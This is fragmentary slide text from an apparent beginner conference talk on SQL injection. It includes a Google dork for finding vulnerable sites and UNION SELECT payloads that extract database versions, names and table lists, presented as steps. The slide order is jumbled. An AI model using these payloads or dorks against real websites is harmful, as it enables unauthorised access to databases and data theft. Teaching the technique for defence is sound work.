Turn on breakfast news and chances are you'll hear about the latest data breach. Another database has been dumped and another million people have had their credit card details stolen. How'd they do it? SQL Injection. SQL Injection is a common vulnerability found in websites and mobile applications. I'll introduce you to it, how it works, how to do it yourself and how to fix it. There will be classic hits, select memes and enough info so that when you get home you can take down your own website and make it rain data.
Check out the full version with hilarious giph's and some sweet tunes here: https://youtu.be/TTkOo9-0wMk
11. What You’re Going to Learn
• Checking for SQL Injection Vulnerabilities is quick and you
can do it too!
• How to execute a SQL Injection
• How to fix SQL vulnerabilities
28. 27
• SQL Injection is the act of querying or sending requests, otherwise known
as questions, to a database.
• Know Thy Database.
Creating a Conversation with the Database
29. From the table called users, check that the username
Jo@influencer4lyfe.com.au is there and that Jo's password which is
Influencerlyfe2019! also matches the password Jo supplied.
Speaking in Database Tongue
35. SQLi Hunting in the Wilds of the Internet
Google Dorks Query
Format for advanced search in
Google
where-you-want-to search:keyword
inurl: php?id=
inurl – Get URL’s or website
addresses
49. 48
5. Get the Database Version
+union select 1,version(),3
50. 49
6. Get the Database Name
+union select database(),2,3
51. 50
'UNION SELECT 1, group_concat(table_name) from
information_schema.tables where table_schema=database()%23
7. Get all the other database names to talk to
them too
52. 51
3. Count the columns to speak to other tables in the database
4. Check for the vulnerable column
5. Get the database version
6. Get the database name
7. Get all the other database names to talk to them too.
1. Get the database to tell you the language it speaks
7 Steps to SQLi Heaven
2. Get the contents of the database you’re currently talking to
60. Thank-you for listening! That was:
It’s Hammertime: SQL Injection For Beginners
#CyberCon #W0m3nWh0HackM3lb0urn3 @Deloitte
Dr. Brigitte Lewis | @briglewis
I am